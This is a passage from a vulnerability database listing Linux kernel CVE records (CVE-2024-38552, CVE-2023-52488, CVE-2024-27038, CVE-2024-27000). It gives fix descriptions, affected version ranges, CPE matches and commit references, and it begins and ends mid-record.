"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Fix potential index out of bounds in color transformation function\n\nFixes index out of bounds issue in the color transformation function.\nThe issue could occur when the index \u0027i\u0027 exceeds the number of transfer\nfunction points (TRANSFER_FUNC_POINTS).\n\nThe fix adds a check to ensure \u0027i\u0027 is within bounds before accessing the\ntransfer function points. If \u0027i\u0027 is out of bounds, an error message is\nlogged and the function returns false to indicate an error.\n\nReported by smatch:\ndrivers/gpu/drm/amd/amdgpu/../display/dc/dcn10/dcn10_cm_common.c:405 cm_helper_translate_curve_to_hw_format() error: buffer overflow \u0027output_tf-\u003etf_pts.red\u0027 1025 \u003c= s32max\ndrivers/gpu/drm/amd/amdgpu/../display/dc/dcn10/dcn10_cm_common.c:406 cm_helper_translate_curve_to_hw_format() error: buffer overflow \u0027output_tf-\u003etf_pts.green\u0027 1025 \u003c= s32max\ndrivers/gpu/drm/amd/amdgpu/../display/dc/dcn10/dcn10_cm_common.c:407 cm_helper_translate_curve_to_hw_format() error: buffer overflow \u0027output_tf-\u003etf_pts.blue\u0027 1025 \u003c= s32max"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:13:50.576Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/604c506ca43fce52bb882cff9c1fdf2ec3b4029c"
},
{
"url": "https://git.kernel.org/stable/c/e280ab978c81443103d7c61bdd1d8d708cf6ed6d"
},
{
"url": "https://git.kernel.org/stable/c/04bc4d1090c343025d69149ca669a27c5b9c34a7"
},
{
"url": "https://git.kernel.org/stable/c/ced9c4e2289a786b8fa684d8893b7045ea53ef7e"
},
{
"url": "https://git.kernel.org/stable/c/98b8a6bfd30d07a19cfacdf82b50f84bf3360869"
},
{
"url": "https://git.kernel.org/stable/c/4e8c8b37ee84b3b19c448d2b8e4c916d2f5b9c86"
},
{
"url": "https://git.kernel.org/stable/c/123edbae64f4d21984359b99c6e79fcde31c6123"
},
{
"url": "https://git.kernel.org/stable/c/7226ddf3311c5e5a7726ad7d4e7b079bb3cfbb29"
},
{
"url": "https://git.kernel.org/stable/c/63ae548f1054a0b71678d0349c7dc9628ddd42ca"
}
],
"title": "drm/amd/display: Fix potential index out of bounds in color transformation function",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38552",
"datePublished": "2024-06-19T13:35:24.067Z",
"dateReserved": "2024-06-18T19:36:34.920Z",
"dateUpdated": "2025-11-04T17:21:24.332Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-52488 (GCVE-0-2023-52488)
Vulnerability from cvelistv5
Published
2024-02-29 15:52
Modified
2025-05-04 07:37
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
serial: sc16is7xx: convert from _raw_ to _noinc_ regmap functions for FIFO
The SC16IS7XX IC supports a burst mode to access the FIFOs where the
initial register address is sent ($00), followed by all the FIFO data
without having to resend the register address each time. In this mode, the
IC doesn't increment the register address for each R/W byte.
The regmap_raw_read() and regmap_raw_write() are functions which can
perform IO over multiple registers. They are currently used to read/write
from/to the FIFO, and although they operate correctly in this burst mode on
the SPI bus, they would corrupt the regmap cache if it was not disabled
manually. The reason is that when the R/W size is more than 1 byte, these
functions assume that the register address is incremented and handle the
cache accordingly.
Convert FIFO R/W functions to use the regmap _noinc_ versions in order to
remove the manual cache control which was a workaround when using the
_raw_ versions. FIFO registers are properly declared as volatile so
cache will not be used/updated for FIFO accesses.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: dfeae619d781dee61666d5551b93ba3be755a86b Version: dfeae619d781dee61666d5551b93ba3be755a86b Version: dfeae619d781dee61666d5551b93ba3be755a86b Version: dfeae619d781dee61666d5551b93ba3be755a86b Version: dfeae619d781dee61666d5551b93ba3be755a86b Version: dfeae619d781dee61666d5551b93ba3be755a86b |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52488",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-12T15:51:12.991001Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:42.809Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:20.407Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4e37416e4ee1b1bc17364a68973e0c63be89e611"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e635f652696ef6f1230621cfd89c350cb5ec6169"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/416b10d2817c94db86829fb92ad43ce7d002c573"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/084c24e788d9cf29c55564de368bf5284f2bb5db"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aa7cb4787698add9367b19f7afc667662c9bdb23"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dbf4ab821804df071c8b566d9813083125e6d97b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/sc16is7xx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4e37416e4ee1b1bc17364a68973e0c63be89e611",
"status": "affected",
"version": "dfeae619d781dee61666d5551b93ba3be755a86b",
"versionType": "git"
},
{
"lessThan": "e635f652696ef6f1230621cfd89c350cb5ec6169",
"status": "affected",
"version": "dfeae619d781dee61666d5551b93ba3be755a86b",
"versionType": "git"
},
{
"lessThan": "416b10d2817c94db86829fb92ad43ce7d002c573",
"status": "affected",
"version": "dfeae619d781dee61666d5551b93ba3be755a86b",
"versionType": "git"
},
{
"lessThan": "084c24e788d9cf29c55564de368bf5284f2bb5db",
"status": "affected",
"version": "dfeae619d781dee61666d5551b93ba3be755a86b",
"versionType": "git"
},
{
"lessThan": "aa7cb4787698add9367b19f7afc667662c9bdb23",
"status": "affected",
"version": "dfeae619d781dee61666d5551b93ba3be755a86b",
"versionType": "git"
},
{
"lessThan": "dbf4ab821804df071c8b566d9813083125e6d97b",
"status": "affected",
"version": "dfeae619d781dee61666d5551b93ba3be755a86b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/sc16is7xx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.16"
},
{
"lessThan": "3.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: sc16is7xx: convert from _raw_ to _noinc_ regmap functions for FIFO\n\nThe SC16IS7XX IC supports a burst mode to access the FIFOs where the\ninitial register address is sent ($00), followed by all the FIFO data\nwithout having to resend the register address each time. In this mode, the\nIC doesn\u0027t increment the register address for each R/W byte.\n\nThe regmap_raw_read() and regmap_raw_write() are functions which can\nperform IO over multiple registers. They are currently used to read/write\nfrom/to the FIFO, and although they operate correctly in this burst mode on\nthe SPI bus, they would corrupt the regmap cache if it was not disabled\nmanually. The reason is that when the R/W size is more than 1 byte, these\nfunctions assume that the register address is incremented and handle the\ncache accordingly.\n\nConvert FIFO R/W functions to use the regmap _noinc_ versions in order to\nremove the manual cache control which was a workaround when using the\n_raw_ versions. FIFO registers are properly declared as volatile so\ncache will not be used/updated for FIFO accesses."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:37:45.532Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4e37416e4ee1b1bc17364a68973e0c63be89e611"
},
{
"url": "https://git.kernel.org/stable/c/e635f652696ef6f1230621cfd89c350cb5ec6169"
},
{
"url": "https://git.kernel.org/stable/c/416b10d2817c94db86829fb92ad43ce7d002c573"
},
{
"url": "https://git.kernel.org/stable/c/084c24e788d9cf29c55564de368bf5284f2bb5db"
},
{
"url": "https://git.kernel.org/stable/c/aa7cb4787698add9367b19f7afc667662c9bdb23"
},
{
"url": "https://git.kernel.org/stable/c/dbf4ab821804df071c8b566d9813083125e6d97b"
}
],
"title": "serial: sc16is7xx: convert from _raw_ to _noinc_ regmap functions for FIFO",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52488",
"datePublished": "2024-02-29T15:52:08.132Z",
"dateReserved": "2024-02-20T12:30:33.301Z",
"dateUpdated": "2025-05-04T07:37:45.532Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27038 (GCVE-0-2024-27038)
Vulnerability from cvelistv5
Published
2024-05-01 12:53
Modified
2025-05-04 09:02
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
clk: Fix clk_core_get NULL dereference
It is possible for clk_core_get to dereference a NULL in the following
sequence:
clk_core_get()
of_clk_get_hw_from_clkspec()
__of_clk_get_hw_from_provider()
__clk_get_hw()
__clk_get_hw() can return NULL which is dereferenced by clk_core_get() at
hw->core.
Prior to commit dde4eff47c82 ("clk: Look for parents with clkdev based
clk_lookups") the check IS_ERR_OR_NULL() was performed which would have
caught the NULL.
Reading the description of this function it talks about returning NULL but
that cannot be so at the moment.
Update the function to check for hw before dereferencing it and return NULL
if hw is NULL.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: dde4eff47c82c52a72af333d9e55370eee6d95d6 Version: dde4eff47c82c52a72af333d9e55370eee6d95d6 Version: dde4eff47c82c52a72af333d9e55370eee6d95d6 Version: dde4eff47c82c52a72af333d9e55370eee6d95d6 Version: dde4eff47c82c52a72af333d9e55370eee6d95d6 Version: dde4eff47c82c52a72af333d9e55370eee6d95d6 Version: dde4eff47c82c52a72af333d9e55370eee6d95d6 Version: dde4eff47c82c52a72af333d9e55370eee6d95d6 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27038",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-01T13:38:53.856287Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:22:44.741Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.879Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d7ae7d1265686b55832a445b1db8cdd69738ac07"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/239174535dba11f7b83de0eaaa27909024f8c185"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0efb9ef6fb95384ba631d6819e66f10392aabfa2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a8b2b26fdd011ebe36d68a9a321ca45801685959"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a5d9b1aa61b401867b9066d54086b3e4ee91f8ed"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c554badcae9c45b737a22d23454170c6020b90e6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6f073b24a9e2becd25ac4505a9780a87e621bb51"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e97fe4901e0f59a0bfd524578fe3768f8ca42428"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/clk/clk.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d7ae7d1265686b55832a445b1db8cdd69738ac07",
"status": "affected",
"version": "dde4eff47c82c52a72af333d9e55370eee6d95d6",
"versionType": "git"
},
{
"lessThan": "239174535dba11f7b83de0eaaa27909024f8c185",
"status": "affected",
"version": "dde4eff47c82c52a72af333d9e55370eee6d95d6",
"versionType": "git"
},
{
"lessThan": "0efb9ef6fb95384ba631d6819e66f10392aabfa2",
"status": "affected",
"version": "dde4eff47c82c52a72af333d9e55370eee6d95d6",
"versionType": "git"
},
{
"lessThan": "a8b2b26fdd011ebe36d68a9a321ca45801685959",
"status": "affected",
"version": "dde4eff47c82c52a72af333d9e55370eee6d95d6",
"versionType": "git"
},
{
"lessThan": "a5d9b1aa61b401867b9066d54086b3e4ee91f8ed",
"status": "affected",
"version": "dde4eff47c82c52a72af333d9e55370eee6d95d6",
"versionType": "git"
},
{
"lessThan": "c554badcae9c45b737a22d23454170c6020b90e6",
"status": "affected",
"version": "dde4eff47c82c52a72af333d9e55370eee6d95d6",
"versionType": "git"
},
{
"lessThan": "6f073b24a9e2becd25ac4505a9780a87e621bb51",
"status": "affected",
"version": "dde4eff47c82c52a72af333d9e55370eee6d95d6",
"versionType": "git"
},
{
"lessThan": "e97fe4901e0f59a0bfd524578fe3768f8ca42428",
"status": "affected",
"version": "dde4eff47c82c52a72af333d9e55370eee6d95d6",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/clk/clk.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.2"
},
{
"lessThan": "5.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: Fix clk_core_get NULL dereference\n\nIt is possible for clk_core_get to dereference a NULL in the following\nsequence:\n\nclk_core_get()\n of_clk_get_hw_from_clkspec()\n __of_clk_get_hw_from_provider()\n __clk_get_hw()\n\n__clk_get_hw() can return NULL which is dereferenced by clk_core_get() at\nhw-\u003ecore.\n\nPrior to commit dde4eff47c82 (\"clk: Look for parents with clkdev based\nclk_lookups\") the check IS_ERR_OR_NULL() was performed which would have\ncaught the NULL.\n\nReading the description of this function it talks about returning NULL but\nthat cannot be so at the moment.\n\nUpdate the function to check for hw before dereferencing it and return NULL\nif hw is NULL."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:02:51.146Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d7ae7d1265686b55832a445b1db8cdd69738ac07"
},
{
"url": "https://git.kernel.org/stable/c/239174535dba11f7b83de0eaaa27909024f8c185"
},
{
"url": "https://git.kernel.org/stable/c/0efb9ef6fb95384ba631d6819e66f10392aabfa2"
},
{
"url": "https://git.kernel.org/stable/c/a8b2b26fdd011ebe36d68a9a321ca45801685959"
},
{
"url": "https://git.kernel.org/stable/c/a5d9b1aa61b401867b9066d54086b3e4ee91f8ed"
},
{
"url": "https://git.kernel.org/stable/c/c554badcae9c45b737a22d23454170c6020b90e6"
},
{
"url": "https://git.kernel.org/stable/c/6f073b24a9e2becd25ac4505a9780a87e621bb51"
},
{
"url": "https://git.kernel.org/stable/c/e97fe4901e0f59a0bfd524578fe3768f8ca42428"
}
],
"title": "clk: Fix clk_core_get NULL dereference",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27038",
"datePublished": "2024-05-01T12:53:53.698Z",
"dateReserved": "2024-02-19T14:20:24.212Z",
"dateUpdated": "2025-05-04T09:02:51.146Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27000 (GCVE-0-2024-27000)
Vulnerability from cvelistv5
Published
2024-05-01 05:28
Modified
2025-11-04 17:16
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
serial: mxs-auart: add spinlock around changing cts state
The uart_handle_cts_change() function in serial_core expects the caller
to hold uport->lock. For example, I have seen the below kernel splat,
when the Bluetooth driver is loaded on an i.MX28 board.
[ 85.119255] ------------[ cut here ]------------
[ 85.124413] WARNING: CPU: 0 PID: 27 at /drivers/tty/serial/serial_core.c:3453 uart_handle_cts_change+0xb4/0xec
[ 85.134694] Modules linked in: hci_uart bluetooth ecdh_generic ecc wlcore_sdio configfs
[ 85.143314] CPU: 0 PID: 27 Comm: kworker/u3:0 Not tainted 6.6.3-00021-gd62a2f068f92 #1
[ 85.151396] Hardware name: Freescale MXS (Device Tree)
[ 85.156679] Workqueue: hci0 hci_power_on [bluetooth]
(...)
[ 85.191765] uart_handle_cts_change from mxs_auart_irq_handle+0x380/0x3f4
[ 85.198787] mxs_auart_irq_handle from __handle_irq_event_percpu+0x88/0x210
(...)
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4d90bb147ef6b91f529a21b498ff2b5fdc6785b4 Version: 4d90bb147ef6b91f529a21b498ff2b5fdc6785b4 Version: 4d90bb147ef6b91f529a21b498ff2b5fdc6785b4 Version: 4d90bb147ef6b91f529a21b498ff2b5fdc6785b4 Version: 4d90bb147ef6b91f529a21b498ff2b5fdc6785b4 Version: 4d90bb147ef6b91f529a21b498ff2b5fdc6785b4 Version: 4d90bb147ef6b91f529a21b498ff2b5fdc6785b4 Version: 4d90bb147ef6b91f529a21b498ff2b5fdc6785b4 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27000",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T17:46:24.840669Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:47:26.528Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:16:13.339Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/56434e295bd446142025913bfdf1587f5e1970ad"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/21535ef0ac1945080198fe3e4347ea498205c99a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0dc0637e6b16158af85945425821bfd0151adb37"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/479244d68f5d94f3903eced52b093c1e01ddb495"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2c9b943e9924cf1269e44289bc5e60e51b0f5270"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5f40fd6ca2cf0bfbc5a5c9e403dfce8ca899ba37"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/94b0e65c75f4af888ab2dd6c90f060f762924e86"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/54c4ec5f8c471b7c1137a1f769648549c423c026"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/mxs-auart.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "56434e295bd446142025913bfdf1587f5e1970ad",
"status": "affected",
"version": "4d90bb147ef6b91f529a21b498ff2b5fdc6785b4",
"versionType": "git"
},
{
"lessThan": "21535ef0ac1945080198fe3e4347ea498205c99a",
"status": "affected",
"version": "4d90bb147ef6b91f529a21b498ff2b5fdc6785b4",
"versionType": "git"
},
{
"lessThan": "0dc0637e6b16158af85945425821bfd0151adb37",
"status": "affected",
"version": "4d90bb147ef6b91f529a21b498ff2b5fdc6785b4",
"versionType": "git"
},
{
"lessThan": "479244d68f5d94f3903eced52b093c1e01ddb495",
"status": "affected",
"version": "4d90bb147ef6b91f529a21b498ff2b5fdc6785b4",
"versionType": "git"
},
{
"lessThan": "2c9b943e9924cf1269e44289bc5e60e51b0f5270",
"status": "affected",
"version": "4d90bb147ef6b91f529a21b498ff2b5fdc6785b4",
"versionType": "git"
},
{
"lessThan": "5f40fd6ca2cf0bfbc5a5c9e403dfce8ca899ba37",
"status": "affected",
"version": "4d90bb147ef6b91f529a21b498ff2b5fdc6785b4",
"versionType": "git"
},
{
